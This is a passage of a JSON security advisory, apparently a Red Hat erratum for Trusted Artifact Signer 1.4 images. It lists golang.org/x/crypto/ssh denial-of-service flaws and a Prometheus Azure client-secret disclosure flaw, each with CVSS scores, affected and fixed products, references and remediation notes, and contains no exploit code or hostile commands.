"url": "https://go.dev/cl/781664"
},
{
"category": "external",
"summary": "https://go.dev/issue/79564",
"url": "https://go.dev/issue/79564"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI",
"url": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5017",
"url": "https://pkg.go.dev/vuln/GO-2026-5017"
}
],
"release_date": "2026-05-22T02:31:27.208000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "To mitigate this denial of service vulnerability, restrict network access to any service that utilizes the `golang.org/x/crypto/ssh` library and is exposed to untrusted networks. Implement firewall rules to allow connections only from trusted hosts or networks. This action limits the ability of malicious peers to send unsolicited global request responses. A restart of the affected service may be necessary for the new network rules to be applied effectively.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Denial of Service via resource leak from unsolicited SSH responses"
},
{
"cve": "CVE-2026-39835",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2026-05-22T04:01:27.279943+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480680"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/crypto/ssh. SSH servers configured to use CertChecker as a public key callback, without explicitly setting IsUserAuthority or IsHostAuthority, are vulnerable. A remote attacker can exploit this by presenting a specially crafted certificate, causing the server to panic and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: golang: golang.org/x/crypto/ssh: Denial of Service via crafted SSH certificate",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service flaw in `golang.org/x/crypto/ssh` affecting SSH servers that utilize `CertChecker` as a public key callback without explicitly configuring `IsUserAuthority` or `IsHostAuthority`. A remote, unauthenticated attacker can trigger a server panic by presenting a specially crafted certificate, leading to service disruption. Exploitation requires a specific, non-default configuration of the `CertChecker`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39835"
},
{
"category": "external",
"summary": "RHBZ#2480680",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480680"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39835",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39835"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39835",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39835"
},
{
"category": "external",
"summary": "https://go.dev/cl/781660",
"url": "https://go.dev/cl/781660"
},
{
"category": "external",
"summary": "https://go.dev/issue/79563",
"url": "https://go.dev/issue/79563"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI",
"url": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5015",
"url": "https://pkg.go.dev/vuln/GO-2026-5015"
}
],
"release_date": "2026-05-22T02:31:26.982000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: golang: golang.org/x/crypto/ssh: Denial of Service via crafted SSH certificate"
},
{
"cve": "CVE-2026-42151",
"cwe": {
"id": "CWE-256",
"name": "Plaintext Storage of a Password"
},
"discovery_date": "2026-05-04T19:02:26.983660+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466507"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Prometheus, an open-source monitoring system. The `client_secret` field within the Azure Active Directory (AD) remote write OAuth configuration was incorrectly handled as a plain string instead of a secure Secret type. This misconfiguration allowed any user or process with access to the `/-/config` HTTP API endpoint to view the Azure OAuth client secret in plaintext. This vulnerability leads to information disclosure, potentially compromising the security of integrated Azure AD services.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/prometheus/prometheus: Prometheus: Information disclosure of Azure OAuth client secret via config API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important information disclosure flaw in Prometheus affects instances configured to use Azure AD remote write with OAuth authentication. The client secret, intended to be a secure credential, is exposed in plaintext through the `/-/config` HTTP API endpoint. This could allow an attacker with access to this endpoint to retrieve the secret, potentially compromising integrated Azure AD services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42151"
},
{
"category": "external",
"summary": "RHBZ#2466507",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466507"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42151"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42151",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42151"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18587",
"url": "https://github.com/prometheus/prometheus/pull/18587"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18590",
"url": "https://github.com/prometheus/prometheus/pull/18590"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj",
"url": "https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj"
}
],
"release_date": "2026-05-04T18:12:16.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/prometheus/prometheus: Prometheus: Information disclosure of Azure OAuth client secret via config API"
},
{
"cve": "CVE-2026-42570",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-09T17:01:16.012124+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
